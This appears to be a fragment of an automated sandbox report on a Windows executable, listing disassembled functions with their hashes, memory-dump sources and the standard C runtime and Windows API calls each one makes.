                                                              • Instruction Fuzzy Hash: CC71B77A6447408FDB048D39C4A43DF7BD2ABA6348F26682EE885C7352C677C94E9F11
                                                              APIs
                                                              • type_info::operator==.LIBVCRUNTIME ref: 001FC5D2
                                                              • ___TypeMatch.LIBVCRUNTIME ref: 001FC6E0
                                                              • CatchIt.LIBVCRUNTIME ref: 001FC731
                                                              • _UnwindNestedFrames.LIBCMT ref: 001FC832
                                                              • CallUnexpected.LIBVCRUNTIME ref: 001FC84D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 4119006552-393685449
                                                              • Opcode ID: 54683e2caaae89dd80156433bb8a9fcd3f23b083b4c7bdf20d9233f4771cdd69
                                                              • Instruction ID: 25a0ef0b1cbac862983ce0e4f67564a3fd47f79d8f798d11232660d36054a530
                                                              • Opcode Fuzzy Hash: 54683e2caaae89dd80156433bb8a9fcd3f23b083b4c7bdf20d9233f4771cdd69
                                                              • Instruction Fuzzy Hash: 3AB1697190020DDFCF19EFA4CA818BEB7B5BF24310B15415AEA15AB212D731EA51EFD1
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: _strrchr
                                                              • String ID:
                                                              • API String ID: 3213747228-0
                                                              • Opcode ID: 41285e77cb004f04a8fd11cd2fb887af5f9d7ae8ca7e119b6c9aa78753bf9a57
                                                              • Instruction ID: db7af3ffaa2864fdacddf8817f7fa2821f46a182bbe8d5175e1a0e76647953f3
                                                              • Opcode Fuzzy Hash: 41285e77cb004f04a8fd11cd2fb887af5f9d7ae8ca7e119b6c9aa78753bf9a57
                                                              • Instruction Fuzzy Hash: FAB14972900359AFDB15CF68CC81BBEBBA5EF55354F154179EA04AB382D3F49902CBA0
                                                              APIs
                                                              • _ValidateLocalCookies.LIBCMT ref: 001F6DB7
                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 001F6DBF
                                                              • _ValidateLocalCookies.LIBCMT ref: 001F6E48
                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 001F6E73
                                                              • _ValidateLocalCookies.LIBCMT ref: 001F6EC8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 1170836740-1018135373
                                                              • Opcode ID: c62f9e9122b1c2ebcaac31c6505c49e41ca9c4fea53942c89b16c0c0c5b9e984
                                                              • Instruction ID: 386b84db76b0e3060bf291177a7fb5e89a76fe3228eda055d84f1a85e8a8af5b
                                                              • Opcode Fuzzy Hash: c62f9e9122b1c2ebcaac31c6505c49e41ca9c4fea53942c89b16c0c0c5b9e984
                                                              • Instruction Fuzzy Hash: 0F41A239A0020CEBCF10DFA8C885AAEBBB5BF45314F148155EA199B393D731AE15CBD1
                                                              APIs
                                                              • FreeLibrary.KERNEL32(00000000,?,001FD219,?,9C2BD565,00000000,9C2BD565,?,?,001FCFCB,00000022,FlsSetValue,0020BED0,0020BED8,9C2BD565), ref: 001FD1CB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID: api-ms-$ext-ms-
                                                              • API String ID: 3664257935-537541572
                                                              • Opcode ID: 7e7479f29bae8e14a6c7101f7043941f39fdf68363cd6439045a0f5eb1d7ea46
                                                              • Instruction ID: 7488d96b280fea4a723fe95e9268b088bee20c3dcd11bc95020d54c705dd312c
                                                              • Opcode Fuzzy Hash: 7e7479f29bae8e14a6c7101f7043941f39fdf68363cd6439045a0f5eb1d7ea46
                                                              • Instruction Fuzzy Hash: 9A21DA72A05315ABD731AB24FC89BBA376AAB527A0F264110FF15A7291DB30ED11C7D0
                                                              APIs
                                                              • GetCPInfo.KERNEL32(02D10580,02D10580,00000000,7FFFFFFF,?,00208EC1,02D10580,02D10580,00000000,02D10580,?,?,?,?,02D10580,00000000), ref: 00208F7C
                                                              • __freea.LIBCMT ref: 00209111
                                                              • __freea.LIBCMT ref: 00209117
                                                              • __freea.LIBCMT ref: 0020914D
                                                              • __freea.LIBCMT ref: 00209153
                                                              • __freea.LIBCMT ref: 00209163
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: __freea$Info
                                                              • String ID:
                                                              • API String ID: 541289543-0
                                                              • Opcode ID: 8b832d1d506d2df978fec610bfb98906d91ffba3e884a59f02aa077738e1105a
                                                              • Instruction ID: ae668b53a803f4ffc2ea79357f5d6b578497e5fd8cc0e79f213e8add3383fbf7
                                                              • Opcode Fuzzy Hash: 8b832d1d506d2df978fec610bfb98906d91ffba3e884a59f02aa077738e1105a
                                                              • Instruction Fuzzy Hash: B1712A32A24307ABDF209F648C89BEFB7BA9F49310F580055E959A72C3DB359C60CB50
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,001FBC0A,001F6B5D,001F6204), ref: 001FBC21
                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001FBC2F
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001FBC48
                                                              • SetLastError.KERNEL32(00000000,001FBC0A,001F6B5D,001F6204), ref: 001FBC9A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastValue___vcrt_
                                                              • String ID:
                                                              • API String ID: 3852720340-0
                                                              • Opcode ID: 8e7d3a81e70e40e49b9a895cd0701c3a84a9d73d3c502c2c36b15bed2960a821
                                                              • Instruction ID: ae2a8d38c5f8b7b920137b5d1c4a7f10f6e524f565cc4d4adfabdc587c5fa47b
                                                              • Opcode Fuzzy Hash: 8e7d3a81e70e40e49b9a895cd0701c3a84a9d73d3c502c2c36b15bed2960a821
                                                              • Instruction Fuzzy Hash: 0301473621D31EAEE7246B78FCC95B72B4DEB22334320422AF314451F2EF518D119954
                                                              Strings
                                                              • C:\Users\user\Desktop\KyC6hVwU8Z.exe, xrefs: 002010E0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: C:\Users\user\Desktop\KyC6hVwU8Z.exe
                                                              • API String ID: 0-1408772118
                                                              • Opcode ID: faeb12654ad50ae3fa778439832d25645dc5d73359098471b777a0323b5fd3a2
                                                              • Instruction ID: 41598626b9ff9801fa49adc3595bf943cda2f66de2e4647ac5b2d9ccfd7509e7
                                                              • Opcode Fuzzy Hash: faeb12654ad50ae3fa778439832d25645dc5d73359098471b777a0323b5fd3a2
                                                              • Instruction Fuzzy Hash: 8B212331620306BFDB24AF64CC81D6BB3AAEF003647108624FA59C7692DB30EC31CB90
                                                              APIs
                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BDC1E488,9C2BD565,?,00000000,0020ADB8,000000FF,?,001F984F,001F9736,?,001F98EB,00000000), ref: 001F97C3
                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001F97D5
                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,0020ADB8,000000FF,?,001F984F,001F9736,?,001F98EB,00000000), ref: 001F97F7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: d863c17a7906f23674dcf5d109af431559743567f4076b92d989f4d9d1f8fda6
                                                              • Instruction ID: fbd74b4915c671373563b4475a829908d30f4deb52521b1aacac569b045fbef9
                                                              • Opcode Fuzzy Hash: d863c17a7906f23674dcf5d109af431559743567f4076b92d989f4d9d1f8fda6
                                                              • Instruction Fuzzy Hash: 65018F31A64719AFDB11AF40EC49FEEB7B9FB08B54F004625F911A26D0DBB49910CA80
                                                              APIs
                                                              • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,001FC7DE,?,?,00000000,00000000,00000000,?), ref: 001FC8FD
                                                              • CatchIt.LIBVCRUNTIME ref: 001FC9E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: CatchEncodePointer
                                                              • String ID: MOC$RCC
                                                              • API String ID: 1435073870-2084237596
                                                              • Opcode ID: 4e9f73c920b6bf5fbf3c6bd98277680e5754fbdd9e3286fd76468f205b2da612
                                                              • Instruction ID: 70e766fb775ac82ea3f65e86ac2ef8d6cbeb7a5d0b24fdb324b7272fb8c687ca
                                                              • Opcode Fuzzy Hash: 4e9f73c920b6bf5fbf3c6bd98277680e5754fbdd9e3286fd76468f205b2da612
                                                              • Instruction Fuzzy Hash: E1416A7190020DAFCF15DF98CE81AEEBBB5FF58304F198099FA08A7211D375A950EB91
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00203AED,?,?,9C2BD565,?,?,?,00203935,00000000,FlsAlloc,0020C824,0020C82C), ref: 00203A5E
                                                              • GetLastError.KERNEL32(?,00203AED,?,?,9C2BD565,?,?,?,00203935,00000000,FlsAlloc,0020C824,0020C82C,?,?,001FBBC1), ref: 00203A68
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,?), ref: 00203A90
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad$ErrorLast
                                                              • String ID: api-ms-
                                                              • API String ID: 3177248105-2084034818
                                                              • Opcode ID: 99a9ba2c857a2b1b58b722a020a479676f7ef447d3192fd73582618707ca1a3f
                                                              • Instruction ID: d489261f867343f9cd2b96e765e2bd6a54ab14751c4e13f28f67eaa673624d08
                                                              • Opcode Fuzzy Hash: 99a9ba2c857a2b1b58b722a020a479676f7ef447d3192fd73582618707ca1a3f
                                                              • Instruction Fuzzy Hash: C0E01231790307BBEB105F50EC0EB9C3A5DAB21B81F148021FA4CA44E2DBB199718684
                                                              APIs
                                                              • GetConsoleOutputCP.KERNEL32(BDC1E488,00000000,00000000,?), ref: 00204472
                                                                • Part of subcall function 0020177F: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00203EB8,?,00000000,-00000008), ref: 002017E0
                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 002046C4
                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0020470A
                                                              • GetLastError.KERNEL32 ref: 002047AD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                              • String ID:
                                                              • API String ID: 2112829910-0
                                                              • Opcode ID: 982c529239fcc42d752957d626d37abfcd68181fb065a36bb841b254a916fefb
                                                              • Instruction ID: 474fdaf177d491912a76729a45398bd707c291c242c58ea62064222a719cdede
                                                              • Opcode Fuzzy Hash: 982c529239fcc42d752957d626d37abfcd68181fb065a36bb841b254a916fefb
                                                              • Instruction Fuzzy Hash: 5CD18CB5D10258AFCB15DFA8D880AEDBBB5EF49304F24812AE515EB392D730A951CB50
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: AdjustPointer
                                                              • String ID:
                                                              • API String ID: 1740715915-0
                                                              • Opcode ID: d6d2c5abb3fe6a3300805ddf875bda53af8784694bfc48b3d0fafd1162c7df9f
                                                              • Instruction ID: 25523f4bb4af25343e0612b5bdd1fa146c7d29d4428de6f56dc4ffe93340189f
                                                              • Opcode Fuzzy Hash: d6d2c5abb3fe6a3300805ddf875bda53af8784694bfc48b3d0fafd1162c7df9f
                                                              • Instruction Fuzzy Hash: D051E572A0420EEFDB298F54DA51BBA77A4FF54750F14802DEA4587292D731EC90EBD0
                                                              APIs
                                                                • Part of subcall function 0020177F: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00203EB8,?,00000000,-00000008), ref: 002017E0
                                                              • GetLastError.KERNEL32(?,?,?,00000000,00000000,?,00200ECB,?,?,?,00000000), ref: 00200B89
                                                              • __dosmaperr.LIBCMT ref: 00200B90
                                                              • GetLastError.KERNEL32(00000000,00200ECB,?,?,00000000,?,?,?,00000000,00000000,?,00200ECB,?,?,?,00000000), ref: 00200BCA
                                                              • __dosmaperr.LIBCMT ref: 00200BD1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                              • String ID:
                                                              • API String ID: 1913693674-0
                                                              • Opcode ID: f0b229236b61ce8ae19f11e073e5dba485064a43ea7c32037eda5b699ece0d85
                                                              • Instruction ID: 83075c85b41067b3e9aacc1bd67c6efb39de791135cd5fa92f09814ef37b434f
                                                              • Opcode Fuzzy Hash: f0b229236b61ce8ae19f11e073e5dba485064a43ea7c32037eda5b699ece0d85
                                                              • Instruction Fuzzy Hash: 67219871624706AFEB20AF6588C1E6BB7A9FF5036CF108529F91997193D770EC608B50
                                                              APIs
                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00201883
                                                                • Part of subcall function 0020177F: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00203EB8,?,00000000,-00000008), ref: 002017E0
                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002018BB
                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002018DB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                              • String ID:
                                                              • API String ID: 158306478-0
                                                              • Opcode ID: 6eb472d55a6a3d164163d109e807d4f12a2c8b08f5c873531baed474d02dc3b7
                                                              • Instruction ID: 579ea8b8a7b5e5474660073eff993a6e46270986fd4cd1a964473d06cd6f0955
                                                              • Opcode Fuzzy Hash: 6eb472d55a6a3d164163d109e807d4f12a2c8b08f5c873531baed474d02dc3b7
                                                              • Instruction Fuzzy Hash: C211C4B652171EBEE7212BB15C8DCBF6AACDE553987100124F601D2152EF708E3245B1
                                                              APIs
                                                              • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,0020838E,00000000,00000001,?,?,?,00204801,?,00000000,00000000), ref: 00209432
                                                              • GetLastError.KERNEL32(?,0020838E,00000000,00000001,?,?,?,00204801,?,00000000,00000000,?,?,?,00204147,?), ref: 0020943E
                                                                • Part of subcall function 00209490: CloseHandle.KERNEL32(FFFFFFFE,0020944E,?,0020838E,00000000,00000001,?,?,?,00204801,?,00000000,00000000,?,?), ref: 002094A0
                                                              • ___initconout.LIBCMT ref: 0020944E
                                                                • Part of subcall function 00209470: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0020940C,0020837B,?,?,00204801,?,00000000,00000000,?), ref: 00209483
                                                              • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,0020838E,00000000,00000001,?,?,?,00204801,?,00000000,00000000,?), ref: 00209463
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                              • String ID:
                                                              • API String ID: 2744216297-0
                                                              • Opcode ID: 29c1ce1defe32ce83b69c737ea4f81ac15cdd1ca01563f4b8ef969d926deac47
                                                              • Instruction ID: 5996d3e0adb3c8d94a004a71793b4c36a6dbe23cd04e64c8d65e44ec51da32f9
                                                              • Opcode Fuzzy Hash: 29c1ce1defe32ce83b69c737ea4f81ac15cdd1ca01563f4b8ef969d926deac47
                                                              • Instruction Fuzzy Hash: 24F0AC36510259BBCF225FA5EC0CAD93F67FF183A1B158110FA1995172CA328971DB91
                                                              APIs
                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 001FC155
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
